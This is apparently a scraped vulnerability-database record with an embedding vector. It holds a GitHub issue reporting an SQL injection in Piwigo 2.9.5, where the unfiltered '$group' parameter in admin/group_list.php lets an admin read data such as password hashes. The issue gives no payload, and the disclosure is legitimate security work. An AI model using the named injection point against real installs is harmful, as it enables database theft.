[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1009" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.9.5:*:*:*:*:*:*:*", "matchCriteriaId": "4803EBB7-FB18-4FB3-A3B1-A476BB2E20AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1009
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
An SQL injection has been discovered in the administration panel of Piwigo v2.9.5. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure. The vulnerability was found in the 'delete' method in admin/group_list.php, because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page. In the figure, I obtained the encrypted password of the user table. ![2](https://user-images.githubusercontent.com/34082644/57190820-617b1080-6f51-11e9-9d69-df2a0d6cd5a9.png) ![3](https://user-images.githubusercontent.com/34082644/57190823-65a72e00-6f51-11e9-9645-9bc19a7a6337.png)
SQL injection in group_list.php
https://api.github.com/repos/Piwigo/Piwigo/issues/1009/comments
1
2019-05-05T08:40:59
2019-08-12T12:26:39Z
https://github.com/Piwigo/Piwigo/issues/1009
440,418,682
1,009
true
This is a GitHub Issue repo:Piwigo owner:Piwigo Title : SQL injection in group_list.php Issue date: --- start body --- An SQL injection has been discovered in the administration panel of Piwigo v2.9.5. The vulnerability allows remote attackers that are authenticated as administrator to inject SQL code into a query and display. This could result in full information disclosure. The vulnerability was found in the 'delete' method in admin/group_list.php, because it does not validate and filter the '$group' parameter when it gets the parameters. And the vulnerability could query any data in the database and display it on the page. In the figure, I obtained the encrypted password of the user table. ![2](https://user-images.githubusercontent.com/34082644/57190820-617b1080-6f51-11e9-9d69-df2a0d6cd5a9.png) ![3](https://user-images.githubusercontent.com/34082644/57190823-65a72e00-6f51-11e9-9645-9bc19a7a6337.png) --- end body ---
944
[ -0.014115321449935436, 0.018084408715367317, -0.002157259965315461, 0.009042204357683659, 0.04391734302043915, 0.026171594858169556, 0.028040993958711624, 0.03370337933301926, 0.013471868820488453, 0.024546029046177864, -0.013410910032689571, -0.022080589085817337, 0.02025182917714119, 0.02021118998527527, -0.0014172893716022372, 0.03592498227953911, -0.022906918078660965, -0.003847170155495405, -0.008906740695238113, -0.02021118998527527, 0.0014917944790795445, -0.027770066633820534, -0.004141803830862045, 0.03928448632359505, -0.013106117025017738, 0.03481418266892433, 0.00398602057248354, 0.012963879853487015, -0.012435571290552616, 0.03454325348138809, 0.03849879652261734, -0.00022669009922537953, -0.00430097384378314, 0.029802022501826286, 0.021457456052303314, -0.03944704309105873, 0.0019405180355533957, 0.0812782421708107, -0.03405558317899704, 0.01648593693971634, -0.000211238773772493, -0.041749924421310425, -0.000128690546262078, 0.0043585458770394325, 0.001051537343300879, -0.00973984319716692, 0.01697360724210739, -0.013228034600615501, -0.034895461052656174, 0.012191737070679665, 0.001554446411319077, -0.025805842131376266, -0.0334053598344326, -0.046518247574567795, -0.03660230338573456, -0.025575553998351097, 0.028799591585993767, 0.0020471957977861166, -0.02565683238208294, 0.0040639122016727924, -0.011243490502238274, 0.02120007574558258, 0.018951376900076866, 0.018490800634026527, 0.003246049862354994, 0.024708585813641548, -0.009624699130654335, 0.004212922416627407, -0.017420636489987373, 0.008473256602883339, 0.018490800634026527, 0.003498351201415062, 0.03332408145070076, -0.0032172638457268476, 0.012720045633614063, 0.01706843078136444, 0.0644807368516922, 0.005167941562831402, -0.016594307497143745, 0.008026226423680782, -0.016905874013900757, 0.019953809678554535, -0.024681493639945984, -0.01689232885837555, 0.022351516410708427, 0.0028802978340536356, -0.06464329361915588, -0.07455924153327942, -0.01261844765394926, -0.026713449507951736, -0.006630950141698122, -0.006420981138944626, -0.011934355832636356, 0.00880514271557331, 0.02071240544319153, 0.021687744185328484, 0.0001607573649380356, -0.010247832164168358, -0.03440779075026512, 0.010823552496731281, -0.062367506325244904, -0.028907962143421173, 0.013261900283396244, 0.026591531932353973, 0.006089095026254654, 0.012144324369728565, 0.026943737640976906, -0.0023435226175934076, -0.0028447385411709547, 0.07905663549900055, 0.032484203577041626, -0.02042793296277523, -0.023055927827954292, 0.007050887681543827, 0.021823208779096603, -0.00011810744763351977, -0.01171084027737379, 0.006725774612277746, -0.03484127297997475, 0.00540500320494175, -0.011175758205354214, -0.05188261345028877, -0.004229855258017778, 0.0051848748698830605, -0.022270238026976585, 0.018328243866562843, -0.004470303654670715, 0.003261289559304714, -0.022676629945635796, 0.023692607879638672, -0.028040993958711624, -0.015740886330604553, 0.0183417908847332, -0.020035088062286377, -0.01146023254841566, 0.03023550659418106, -0.005682704038918018, 0.03459743782877922, -0.009015112183988094, -0.03028969280421734, -0.035112202167510986, 0.00011630832159426063, -0.0012462664162740111, -0.014982289634644985, -0.02901633270084858, 0.020075727254152298, 0.01648593693971634, -0.012286561541259289, -0.021633559837937355, 0.0030225347727537155, 0.01853143982589245, -0.026713449507951736, 0.03413686156272888, 0.01511775329709053, 0.018328243866562843, 0.012787776999175549, 0.0065395119599998, 0.010024316608905792, -0.03373046964406967, -0.03226746246218681, -0.017447730526328087, -0.021105250343680382, 0.014047590084373951, -0.019330676645040512, -0.014765547588467598, -0.002749913837760687, 0.026415430009365082, -0.015212577767670155, -0.026483161374926567, 0.013410910032689571, 0.01584925688803196, -0.017542554065585136, -0.032809317111968994, 0.00035030077560804784, -0.026781180873513222, -0.0027820866089314222, -0.0037218662910163403, -0.03245711326599121, -0.031129566952586174, -0.027079202234745026, -0.028501570224761963, 0.002126780804246664, -0.0428607277572155, -0.015862803906202316, 0.016147278249263763, -0.0071186195127666, 0.029747838154435158, -0.013390590436756611, 0.040395285934209824, -0.008141370490193367, 0.000350089103449136, -0.017230987548828125, 0.02365196868777275, -0.029368538409471512, -0.01884300634264946, 0.000541008310392499, -0.017854120582342148, -0.0267405416816473, 0.03191525861620903, -0.008398751728236675, 0.02760750986635685, -0.017285173758864403, -0.015673154965043068, -0.004636246711015701, 0.00513068912550807, 0.0284744780510664, -0.023530051112174988, 0.05307469516992569, -0.03917611390352249, -0.016187917441129684, -0.03015422821044922, -0.004707364831119776, 0.016743319109082222, 0.03882390633225441, -0.020224737003445625, 0.019967354834079742, 0.029937487095594406, -0.025900667533278465, 0.0015121139585971832, -0.007565649691969156, 0.004727684427052736, 0.001120115746743977, 0.008432617411017418, 0.012686179019510746, -0.007450505625456572, -0.026171594858169556, -0.0176644716411829, 0.038661353290081024, -0.034163955599069595, -0.022188961505889893, 0.0020014767069369555, -0.011067387647926807, -0.019493231549859047, -0.0025026926305145025, 0.019723521545529366, -0.025277534499764442, 0.004842828493565321, 0.004700591787695885, -0.02292046509683132, -0.017244534566998482, 0.042427241802215576, 0.02814936451613903, -0.0010481507051736116, 0.012252694927155972, 0.03541022166609764, 0.07938174903392792, -0.023679062724113464, -0.007978814654052258, -0.015957629308104515, 0.039745062589645386, 0.0000018090494222633424, -0.01049166638404131, -0.007132166065275669, -0.014602990821003914, -0.027160480618476868, -0.023773886263370514, 0.003047934267669916, 0.023218484595417976, -0.020143458619713783, 0.003806531196460128, -0.008182009682059288, 0.019086841493844986, -0.06247587874531746, 0.01685168966650963, 0.02506079152226448, 0.004714138340204954, 0.009367317892611027, -0.012537169270217419, 0.00971275009214878, -0.03790275380015373, -0.015903443098068237, -0.0055709462612867355, -0.023733247071504593, -0.054917000234127045, 0.007050887681543827, 0.011406047269701958, -0.00992271862924099, -0.0014206760097295046, -0.011880169622600079, 0.029856208711862564, -0.024275101721286774, 0.0031241325195878744, -0.021728383377194405, 0.010274924337863922, 0.04754777252674103, 0.0275126863270998, -0.010132688097655773, -0.002878604456782341, -0.0019252784550189972, 0.025981945917010307, -0.019168119877576828, 0.005933311767876148, -0.04917333647608757, -0.02214832231402397, -0.005506601184606552, 0.05321015790104866, 0.013993404805660248, 0.025182709097862244, -0.03392012044787407, -0.008710318244993687, 0.0009939651936292648, 0.0023960149846971035, -0.05651547387242317, 0.01839597523212433, -0.037794385105371475, 0.005513374228030443, -0.005608198698610067, 0.032755132764577866, -0.03467871621251106, -0.03373046964406967, 0.02669990248978138, -0.027851345017552376, -0.0016247181920334697, -0.017596740275621414, -0.026117408648133278, 0.011765025556087494, 0.004412731155753136, 0.008005906827747822, 0.056407101452350616, -0.01053230557590723, 0.0006955216522328556, -0.0031783180311322212, -0.05879126489162445, -0.0034289259929209948, 0.04199375957250595, 0.020739499479532242, -0.03299896791577339, -0.017109069973230362, -0.05369782820343971, 0.015469959005713463, 0.0005850340239703655, -0.025006607174873352, -0.027959715574979782, -0.0036913868971168995, -0.0415060892701149, -0.030127136036753654, -0.015971174463629723, 0.03459743782877922, 0.013309312053024769, -0.009448596276342869, -0.012090139091014862, 0.010186873376369476, -0.0023079635575413704, 0.028230642899870872, 0.04231887310743332, 0.015239670872688293, 0.0007649468025192618, -0.010254604741930962, 0.04925461485981941, -0.03546440601348877, 0.0007281175930984318, 0.01733935810625553, -0.006827372591942549, 0.01675686426460743, -0.0002152603556169197, -0.01202918030321598, 0.02687600627541542, -0.007823031395673752, -0.008547762408852577, -0.0031952508725225925, 0.03199653699994087, -0.05662384256720543, -0.014332063496112823, -0.004179056268185377, -0.008927060291171074, 0.011568603105843067, 0.014928104355931282, 0.023624876514077187, 0.004124870989471674, -0.03159014508128166, -0.037387993186712265, 0.019737066701054573, 0.003698160173371434, 0.0026279964949935675, -0.02950400300323963, -0.012930014170706272, -0.0025975173339247704, 0.003799757920205593, -0.024397019296884537, 0.013106117025017738, 0.013681837357580662, -0.023692607879638672, -0.03519348055124283, -0.040476564317941666, 0.01992671564221382, -0.01725807972252369, 0.023773886263370514, 0.01545641291886568, 0.037117063999176025, -0.029666559770703316, -0.005432095844298601, 0.09477043151855469, -0.016905874013900757, -0.04771032929420471, -0.010593264363706112, 0.004175669979304075, -0.020780138671398163, 0.0036778405774384737, 0.01001077052205801, -0.04218341037631035, 0.03665648773312569, -0.030668990686535835, -0.04348386079072952, -0.044919777661561966, -0.028176458552479744, -0.015591876581311226, 0.038796816021203995, -0.022527620196342468, 0.019818345084786415, 0.013620879501104355, -0.006495486479252577, 0.0183417908847332, -0.07455924153327942, 0.0030191480182111263, 0.03741508349776268, 0.048875316977500916, 0.014264332130551338, -0.004703978542238474, 0.006847692187875509, 0.03730671480298042, 0.007396320346742868, 0.03849879652261734, -0.011724386364221573, 0.016878781840205193, -0.00009366047743242234, -0.02306947484612465, -0.0025162389501929283, 0.03619591146707535, 0.07033277302980423, 0.006996702402830124, 0.015104207210242748, 0.019764158874750137, -0.041018418967723846, -0.04559709504246712, 0.0040300460532307625, -0.013912126421928406, -0.0023723088670521975, -0.007795938290655613, -0.011866623535752296, -0.012333973310887814, -0.022188961505889893, 0.027634603902697563, -0.01430497132241726, 0.054320961236953735, -0.02210768312215805, -0.01257780846208334, 0.0077756186947226524, 0.01284873578697443, -0.005808007903397083, 0.027052108198404312, -0.0235571451485157, -0.023868711665272713, -0.0023926282301545143, -0.03581661358475685, 0.00485976180061698, -0.007037341129034758, -0.018043769523501396, -0.008405525237321854, 0.03370337933301926, 0.03484127297997475, -0.030343877151608467, 0.012435571290552616, -0.06301773339509964, 0.014332063496112823, 0.02488468959927559, 0.020820776000618935, 0.015700247138738632, 0.025304626673460007, 0.023692607879638672, -0.045055240392684937, 0.012740365229547024, 0.027079202234745026, 0.02955818735063076, -0.014399795792996883, -0.006773186847567558, 0.048143815249204636, 0.015090661123394966, 0.024871142581105232, -0.009001565165817738, 0.05093436688184738, -0.0036846138536930084, 0.00828360766172409, 0.02106461115181446, 0.01116898562759161, 0.028311921283602715, -0.0077756186947226524, 0.030858639627695084, -0.0008872874896042049, -0.03196944296360016, 0.03847170248627663, -0.007890762761235237, 0.008175237104296684, -0.05104273557662964, 0.013844394125044346, 0.0013165381969884038, -0.008412298746407032, -0.029395632445812225, -0.013255126774311066, 0.02247343398630619, -0.005794461350888014, 0.03820077329874039, -0.01992671564221382, -0.011907262727618217, -0.018423069268465042, 0.0039453813806176186, -0.0015409000916406512, -0.04429664462804794, -0.003246049862354994, 0.0007636768277734518, 0.05535048618912697, -0.012943560257554054, -0.0167026799172163, -0.029205981642007828, -0.08008616417646408, -0.0012919853907078505, -0.0070644342340528965, 0.043158747255802155, 0.009435049258172512, 0.0027228211984038353, 0.00428065424785018, -0.009252173826098442, 0.00011122842988697812, -0.04616604372859001, 0.014034043066203594, 0.01689232885837555, 0.0324300192296505, 0.02237861044704914, 0.034163955599069595, -0.023909350857138634, -0.018992016091942787, -0.01720389537513256, 0.010383295826613903, 0.0028582848608493805, 0.029341446235775948, 0.010701635852456093, 0.022690176963806152, 0.0025619580410420895, -0.010979335755109787, -0.02842029184103012, 0.02270372211933136, -0.027174025774002075, 0.034570347517728806, -0.04126225411891937, -0.01911393366754055, 0.029395632445812225, 0.03768601268529892, -0.016783958300948143, 0.002197899157181382, -0.00011630832159426063, -0.04808962717652321, -0.010986109264194965, 0.0016314914682880044, -0.00047115981578826904, -0.0008559615234844387, 0.003806531196460128, -0.006658042781054974, 0.023909350857138634, 0.044106993824243546, 0.02233797125518322, -0.007877216674387455, 0.008730637840926647, -0.003213877324014902, 0.0096517913043499, -0.044106993824243546, 0.01421014592051506, -0.005493054632097483, -0.01666204072535038, 0.02102397195994854, -0.0009575593285262585, 0.0015535997226834297, 0.044242456555366516, 0.00515439547598362, -0.03985343128442764, -0.024708585813641548, 0.0022825640626251698, 0.008866101503372192, 0.005841873586177826, 0.007633381988853216, -0.021037518978118896, 0.001447768765501678, -0.005100209731608629, -0.01234752032905817, -0.005205194000154734, 0.01843661442399025, 0.03727962076663971, -0.011480552144348621, 0.031156660988926888, 0.02351650595664978, -0.021552281454205513, -0.017488369718194008, -0.0062719713896512985, 0.004324679728597403, 0.04145190492272377, -0.01980479806661606, 0.003403526498004794, 0.010633903555572033, 0.005618358496576548, -0.005797848105430603, 0.009286039508879185, -0.0012166337110102177, -0.023096567019820213, 0.026903098449110985, 0.025399452075362206, -0.004802189767360687, -0.0008728944812901318, 0.026537347584962845, 0.021267807111144066, -0.00889996811747551, -0.012449117377400398, 0.0413164421916008, -0.01393921859562397, 0.010213966481387615, 0.05079890415072441, -0.02237861044704914, 0.03253839164972305, 0.006861238274723291, 0.019913170486688614, 0.006861238274723291, 0.014332063496112823, 0.01779993623495102, 0.038796816021203995, -0.043240025639534, 0.0025145455729216337, 0.01857207901775837, 0.034895461052656174, 0.008127824403345585, -0.005669157486408949, 0.005977337714284658, 0.0016670506447553635, -0.00887964852154255, -0.03077736124396324, 0.023963535204529762, -0.005039250943809748, -0.026618624106049538, -0.018274059519171715, 0.016025360673666, 0.03042515553534031, 0.023638423532247543, -0.007281176280230284, 0.0461389496922493, -0.0008060092804953456, 0.0015155005967244506, 0.0021301673259586096, 0.03392012044787407, -0.018368883058428764, -0.029476910829544067, 0.01839597523212433, -0.0005922305281274021, 0.021918032318353653, 0.016079546883702278, -0.022554712370038033, -0.012252694927155972, 0.044161178171634674, -0.00540500320494175, -0.009231854230165482, -0.02465440146625042, 0.02256825938820839, 0.011277356185019016, 0.016336927190423012, -0.007315041963011026, -0.02950400300323963, -0.030668990686535835, 0.00018404019647277892, -0.006790120154619217, -0.009089617058634758, 0.028230642899870872, 0.00029569194884970784, -0.013783435337245464, 0.03042515553534031, -0.0012792856432497501, 0.008317473344504833, -0.00283796526491642, -0.01454880554229021, 0.032348740845918655, -0.0074843717738986015, -0.02096978761255741, -0.011053841561079025, -0.010525532998144627, -0.018504347652196884, -0.034299418330192566, -0.04142481088638306, 0.002081061713397503, 0.0091234827414155, 0.0023333628196269274, -0.03587079793214798, -0.004094391595572233, 0.0021183141507208347, 0.010999655351042747, -0.011141892522573471, -0.026076769456267357, 0.0007416639709845185, 0.00258227763697505, 0.028853775933384895, 0.009773708879947662, 0.007254083175212145, -0.028853775933384895, 0.016174370422959328, 0.01635047420859337, -0.03901355713605881, 0.027025016024708748, -0.03814658895134926, 0.01575443334877491, -0.0012589661637321115, 0.04264398664236069, 0.0069831558503210545, 0.02714693360030651, -0.012990972958505154, 0.01062035746872425, 0.005388070363551378, 0.006041682790964842, -0.0034780316054821014, 0.02774297446012497, -0.02392289601266384, 0.03508510813117027, -0.01747482270002365, -0.016960060223937035, 0.009726296178996563, 0.026252873241901398, -0.002849818440154195, 0.016689132899045944, -0.010498439893126488, -0.00892028771340847, -0.04562418907880783, -0.023773886263370514, -0.025534914806485176, -0.005960404407233, 0.011053841561079025, 0.009590832516551018, 0.020184097811579704, 0.02256825938820839, -0.00022182187240105122, 0.010457800701260567, 0.03768601268529892, -0.0036778405774384737, -0.03191525861620903, -0.011229944415390491, 0.03673776611685753, -0.017718657851219177, -0.0011116493260487914, -0.009448596276342869, -0.006095868535339832, 0.0032528231386095285, -0.011047068051993847, -0.023909350857138634, -0.002380775287747383, 0.013343178667128086, -0.017948945984244347, -0.01853143982589245, 0.026483161374926567, 0.01788121461868286, 0.02197221852838993, -0.017244534566998482, 0.05889963358640671, -0.017854120582342148, -0.006732548121362925, -0.019506778568029404, -0.0038742630276829004, 0.003806531196460128, 0.02324557863175869, -0.023083021864295006, 0.0009304665727540851, 0.03749636188149452, -0.008696772158145905, 0.0057775285094976425, 0.012767457403242588, 0.018287604674696922, -0.0033239414915442467, -0.01034943014383316, -0.002602597000077367, -0.008256514556705952, -0.007497917860746384, -0.011473778635263443, -0.00313259894028306, 0.009021884761750698, -0.004456757102161646, -0.010735501535236835, 0.0382278673350811, 0.05318306386470795, -0.012652313336730003, 0.037929847836494446, -0.03627718985080719, -0.019872531294822693, -0.016960060223937035, 0.02806808613240719, 0.00573011627420783, -0.0284744780510664, 0.02573811076581478, -0.009794028475880623, 0.007931401953101158, -0.0024027880281209946, -0.028176458552479744, 0.004775096662342548, 0.0026906486600637436, -0.021362632513046265, 0.002583970781415701, -0.005987497512251139, 0.024451205506920815, 0.0007552103488706052, -0.020414385944604874, -0.012063045985996723, 0.03660230338573456, 0.01421014592051506, -0.02011636458337307, -0.044838499277830124, -0.017379997298121452, -0.010037863627076149, 0.003146145259961486, 0.03237583488225937, -0.016445297747850418, 0.013695384375751019, -0.0005380450165830553, -0.012171417474746704, -0.006051842588931322, 0.03871553763747215, -0.012821642681956291, 0.013817301951348782, 0.027390768751502037, -0.03131921589374542, 0.012022406794130802, -0.018870098516345024, 0.009360544383525848, 0.004768323618918657, -0.006522579118609428, -0.045515816658735275, -0.005066344048827887, -0.011270583607256413, -0.025128524750471115, 0.008202329277992249, 0.0001291138760279864, -0.025616193190217018, 0.01779993623495102, -0.024640854448080063, 0.01720389537513256, 0.01457589864730835, 0.004663339350372553, -0.004199375864118338, 0.027932623401284218, 0.021362632513046265, -0.012699726037681103, 0.006028136238455772, -0.009069297462701797, -0.0036846138536930084, -0.006664815824478865, -0.012584581039845943, -0.010884511284530163, -0.0334053598344326, -0.00851389579474926, -0.008547762408852577, 0.0068172127939760685, 0.002247004769742489, 0.00199809018522501, 0.015212577767670155, -0.050338324159383774, 0.05575687438249588, 0.03318861499428749, -0.018355336040258408, -0.03161723539233208, 0.003931835293769836, 0.0058181677013635635, -0.006790120154619217, 0.01761028543114662, 0.030939918011426926, -0.013620879501104355, 0.026889553293585777, 0.017149709165096283, 0.007836577482521534, -0.005581106059253216, -0.027932623401284218, 0.0245189368724823, -0.02728239819407463, -0.01866690255701542, -0.0018693995662033558, 0.014169507659971714, 0.015578330494463444, 0.013573466800153255, -0.030723176896572113, -0.03245711326599121, -0.01450816635042429, -0.008540988899767399, -0.02170129120349884, -0.0261580478399992, -0.02388225682079792, -0.03522057086229324, -0.008161690086126328, -0.004094391595572233, -0.004250174853950739, 0.01693296805024147, -0.021457456052303314, -0.006840918678790331, 0.021321993321180344, 0.007071207277476788, -0.014196599833667278, -0.05139494314789772, -0.026252873241901398, 0.009407957084476948, -0.001962530892342329, 0.006779960356652737, 0.01230688113719225, -0.03169851377606392, 0.01820632629096508, 0.004470303654670715, 0.0010092048905789852, 0.00016901218623388559, 0.008432617411017418, -0.0024857595562934875, 0.003935221582651138, 0.03541022166609764, -0.0011743012582883239, 0.01942550018429756, 0.013505734503269196, -0.016729772090911865, -0.0006400661659426987, -0.031075382605195045, -0.006532738916575909, 0.0015019542770460248, -0.02052275650203228, 0.010092048905789852, 0.006542898714542389, -0.01762383244931698, -0.0004495703033171594, 0.00008656979480292648, 0.023814525455236435, 0.005557400174438953, 0.008087185211479664, 0.004632859956473112, -0.00625503808259964, -0.00883223582059145, 0.009645018726587296, 0.018856553360819817, 0.021403271704912186, -0.022730816155672073, -0.035626962780952454, -0.019940262660384178, 0.00889996811747551, 0.030668990686535835, -0.0021437136456370354, 0.009929492138326168, 0.016336927190423012, 0.011534737423062325, -0.021498095244169235, -0.0091708954423666, -0.006458234041929245, 0.008988019078969955, -0.02098333276808262, 0.0003079683519899845, -0.004074071999639273, -0.013864713720977306, -0.0012251002481207252, -0.007816257886588573, 0.004375478718429804, -0.04516361281275749, -0.016242101788520813, -0.011934355832636356, -0.010295243933796883, -0.03150886669754982, 0.03299896791577339, -0.03608753904700279, 0.03419104963541031, -0.004947813227772713, 0.021037518978118896, -0.00386410322971642, -0.01518548559397459, -0.004866534844040871, -0.009015112183988094, -0.027431407943367958, 0.03801112622022629, -0.008229422383010387, 0.008439390920102596, -0.01839597523212433, 0.012537169270217419, -0.032348740845918655, -0.00025505281519144773, 0.016309835016727448, 0.022635990753769875, -0.005577719304710627, 0.020536303520202637, -0.014724908396601677, -0.026591531932353973, 0.005614972207695246, 0.043158747255802155, -0.013837621547281742, -0.013952765613794327, 0.008615493774414062, -0.005289859138429165, 0.013295765966176987, -0.04529907554388046, -0.014453981071710587, 0.04627441242337227, -0.013390590436756611, 0.0006273664766922593, 0.003725252812728286, -0.013038384728133678, -0.010098821483552456, -0.01291646808385849, 0.007768845651298761, -0.006922197062522173, -0.0007145712152123451, -0.019127480685710907, -0.01784057542681694, -0.0054388693533837795, 0.02860994264483452, -0.007511464413255453, 0.02324557863175869, -0.015564783476293087, -0.00395215442404151, 0.028907962143421173, -0.024139638990163803, -0.026672810316085815, 0.0069831558503210545, 0.014684269204735756, -0.018003130331635475, 0.024085452780127525, 0.04183120280504227, 0.0044906227849423885, 0.000697638257406652, -0.02061758190393448, 0.020035088062286377, 0.039663784205913544, -0.0062313321977853775, 0.005296632181853056, -0.006976382806897163, 0.029205981642007828, -0.04001598805189133, -0.004033432807773352, -0.00007942620140966028, 0.010288471356034279, -0.022080589085817337, -0.00022838340373709798, 0.023773886263370514, 0.02728239819407463, 0.017867667600512505, 0.004449984058737755, -0.0013825767673552036, 0.005774141754955053, 0.00568609032779932, -0.030452249571681023, -0.01227978803217411, -0.00915057584643364, -0.02306947484612465, 0.013715703971683979, 0.019601603969931602, -0.02096978761255741, -0.014047590084373951, -0.0019015722209587693, 0.010044636204838753, 0.012069819495081902, -0.02720111981034279, -0.007585969287902117, 0.0055303070694208145, -0.023855164647102356, 0.0038573299534618855, -0.021538734436035156, 0.023164300248026848, -0.004900400992482901, -0.005923151969909668, 0.009766935370862484, -0.005892672576010227, -0.042833633720874786, -0.026117408648133278, 0.008019453845918179, 0.0001418136089341715, -0.01915457285940647, -0.0073218150064349174, -0.036385562270879745, -0.010891284793615341, -0.0384175181388855, -0.00878482311964035, 0.013993404805660248, -0.0010600037639960647, -0.024004174396395683, 0.020265376195311546, 0.006224558688700199, -0.005262766499072313, -0.008507123216986656, 0.0003124132636003196, 0.0014867145800963044, 0.004802189767360687, 0.001684830291196704, -0.025683924555778503, 0.0017068431479856372, 0.01108093373477459, -0.02306947484612465, -0.011040294542908669, 0.022906918078660965, -0.03196944296360016, -0.007802711334079504, 0.011914036236703396, -0.0037320260889828205, 0.0103291105479002, -0.0068239858373999596, -0.015781525522470474, -0.016201462596654892, 0.009929492138326168, -0.013092570938169956, -0.0036439746618270874, 0.01779993623495102, 0.015767978504300117, 0.034489069133996964, 0.00772820645943284, -0.003698160173371434, 0.026415430009365082, -0.006343089509755373, 0.017325812950730324, 0.02160646580159664, 0.000505449075717479, -0.009841441176831722, -0.006268584635108709, -0.001288598868995905, -0.004666725639253855, 0.006177146453410387, -0.0027651535347104073, 0.0071186195127666, -0.006837532389909029, -0.003291768953204155, 0.012889374978840351, 0.024166731163859367, 0.007572423201054335, -0.004680272191762924, 0.007145712152123451, 0.0169871523976326, -0.01697360724210739, 0.01774575002491474, 0.008574854582548141, -0.007592742796987295, -0.020373746752738953, -0.021809661760926247, -0.005432095844298601, -0.02579229697585106, -0.01616082340478897, -0.005225513596087694, -0.006177146453410387, -0.0024061747826635838, -0.006068775430321693, 0.01234752032905817, -0.013952765613794327, -0.029124705120921135, -0.04670789837837219, -0.005394843406975269, -0.0023418294731527567, -0.002180966315791011, -0.011859850026667118, 0.022405702620744705, 0.01251007616519928, 0.012388159520924091, 0.025643285363912582, -0.02210768312215805, -0.025724563747644424, -0.015876350924372673, -0.01956096477806568, 0.015876350924372673, -0.0167026799172163, -0.011196077801287174, 0.002252084668725729, 0.02665926329791546, 0.010891284793615341, -0.01060003787279129, 0.00484621524810791, -0.0018067476339638233, -0.012063045985996723, 0.009543420746922493, -0.007579196244478226, -0.026591531932353973, 0.0002609793737065047, -0.015375134535133839, 0.008507123216986656, -0.03904065117239952, 0.028095180168747902, 0.00937409047037363, 0.0007721433066762984, -0.012909694574773312, 0.007057660724967718, 0.013912126421928406, 0.015239670872688293, -0.00016922384384088218, 0.028853775933384895, -0.01368861086666584, 0.010180099867284298, -0.007098299916833639, 0.028230642899870872, -0.03245711326599121, 0.00042967405170202255, -0.004734457936137915, 0.01779993623495102, -0.019506778568029404, -0.005235673394054174, 0.0018101342720910907, -0.002783779753372073, 0.021985765546560287, 0.003356114262714982, 0.014833279885351658, -0.0007767998613417149, 0.027268851175904274, 0.03622300550341606, 0.0010650836629793048, 0.012665859423577785, -0.02320493943989277, 0.012354292906820774, 0.015442866832017899, 0.014061136171221733, -0.0024078679271042347, -0.0058181677013635635, -0.011155438609421253, 0.012401705607771873, 0.011473778635263443, 0.00978048238903284, 0.0046904319897294044, -0.005953631363809109, -0.05258702486753464, -0.026347696781158447, -0.008303927257657051, 0.008182009682059288, -0.014697816222906113, 0.018788820132613182, 0.006258424837142229, 0.01368861086666584, 0.013695384375751019, 0.0029124703723937273, 0.006102641578763723, -0.007585969287902117, 0.01857207901775837, -0.004602380562573671, 0.012747137807309628, 0.0029869754798710346, -0.00540161645039916, 0.009008338674902916, 0.016594307497143745, 0.016079546883702278, 0.007226990535855293, 0.01598472148180008, -0.0074098664335906506, 0.010335883125662804, 0.014643630012869835, -0.03351372852921486, 0.021714838221669197, 0.0026364631485193968, -0.02664571814239025, -0.002038729377090931, -0.02928726002573967, 0.008432617411017418, 0.007091526873409748, 0.002895537531003356, -0.013675064779818058, 0.001518887234851718, -0.005198420956730843, 0.023719700053334236, 0.009279265999794006, 0.02455957606434822, 0.00044787698425352573, 0.008676452562212944, 0.023773886263370514, 0.026117408648133278, 0.010688088834285736, -0.01001077052205801, 0.04911915212869644, -0.01843661442399025, 0.027485592290759087, 0.026997923851013184, -0.009130256250500679, 0.020048633217811584, -0.01175825297832489, -0.001072703511454165, 0.0384175181388855, 0.029449816793203354, -0.005791075062006712, -0.023855164647102356, -0.021782569587230682, 0.008750957436859608, 0.025643285363912582, 0.0030699470080435276, 0.006956063210964203, 0.018192781135439873, -0.013255126774311066, 0.0384175181388855, -0.00566577073186636, 0.010207192972302437, -0.014359156601130962, 0.01341768354177475, -0.010972563177347183, 0.005791075062006712, 0.011561830528080463, -0.004348386079072952, 0.00013980281073600054, -0.016011813655495644, 0.0030885732267051935, -0.00482589565217495, -0.02869122102856636, 0.012401705607771873, -0.005774141754955053, -0.01146023254841566, -0.0040198867209255695, -0.013912126421928406, -0.01114866603165865, -0.006956063210964203, -0.010037863627076149, -0.03172560781240463, 0.0017271627439185977, 0.006285517476499081, 0.01788121461868286, -0.020441478118300438, 0.018368883058428764, 0.010735501535236835, -0.008778050541877747, -0.021958671510219574, 0.013424457050859928, 0.016187917441129684, -0.0096517913043499, -0.00853421539068222, 0.002754993736743927, 0.012665859423577785, 0.004334839526563883, -0.007633381988853216, -0.002109847730025649, -0.020007994025945663, -0.012157870456576347, -0.00717280525714159, 0.04145190492272377, -0.028176458552479744, -0.021105250343680382, 0.019831892102956772, -0.006956063210964203, -0.03256548196077347, 0.001229333458468318, 0.026781180873513222, -0.007619835436344147, -0.02202640473842621, -0.03538312762975693, 0.0267405416816473, -0.014928104355931282, -0.010647449642419815, 0.027770066633820534, 0.015835711732506752, 0.007890762761235237, 0.00454142177477479, -0.009211534634232521, 0.019141025841236115, -0.0014376089675351977, 0.015767978504300117, 0.014020496979355812, -0.01057971827685833, -0.015442866832017899, -0.01316707581281662, -0.01907329447567463, -0.00031029662932269275, -0.010058182291686535, -0.03408267721533775, -0.0005096823442727327, 0.03199653699994087, -0.006536125671118498, 0.0066952952183783054, -0.006133120972663164, -0.010708408430218697, 0.0008047393057495356, 0.04708719626069069, 0.0028227258007973433, 0.018138594925403595, 0.013729250058531761, 0.0025755043607205153, -0.024911781772971153, 0.001518887234851718, 0.006194079760462046, -0.013451549224555492, -0.024451205506920815, 0.0291517972946167, -0.021443910896778107, 0.012090139091014862, 0.025440091267228127, -0.004615927115082741, 0.007829803973436356, -0.019642243161797523, -0.02651025354862213, -0.009841441176831722, -0.005835100542753935, 0.009915946051478386, 